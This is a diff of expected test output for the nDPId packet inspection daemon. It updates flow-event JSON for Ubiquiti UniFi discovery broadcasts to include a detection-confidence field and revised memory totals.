 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1486943453510,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1486943453510,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4NAAEARuPXAqAEB\/\/\/\/\/9gZJxEAt8imAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADedAsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdEbAAU0LjAuMA=="}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943453510,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943453510,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943463665,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1486943463665,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1486943463665,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4RAAEARuPTAqAEB\/\/\/\/\/7r\/JxEAt+S2AgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADefgsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdIbAAU0LjAuMA=="}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943463665,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943463665,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943473817,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1486943473817,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1486943473817,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4VAAEARuPPAqAEB\/\/\/\/\/+l8JxEAt7UuAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADeiQsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdMbAAU0LjAuMA=="}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943473817,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943473817,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943483995,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1486943483995,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1486943483995,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4ZAAEARuPLAqAEB\/\/\/\/\/8v8JxEAt9GkAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADekwsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdQbAAU0LjAuMA=="}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943483995,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943483995,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943494148,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1486943494148,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1486943494148,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4dAAEARuPHAqAEB\/\/\/\/\/7qCJxEAt+IUAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADenQsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdUbAAU0LjAuMA=="}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943494148,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943494148,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1486943504301,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1486943504301,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4hAAEARuPDAqAEB\/\/\/\/\/6dWJxEAt\/Q2AgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADepwsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdYbAAU0LjAuMA=="}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","total-events-serialized":34}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 8/8
@@ -40,10 +40,10 @@
 ~~ total active/idle flows...: 8/8
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4603461 bytes
-~~ total memory freed........: 4603461 bytes
-~~ total allocations/frees...: 99582/99582
+~~ total memory allocated....: 4686118 bytes
+~~ total memory freed........: 4686118 bytes
+~~ total allocations/frees...: 101172/101172
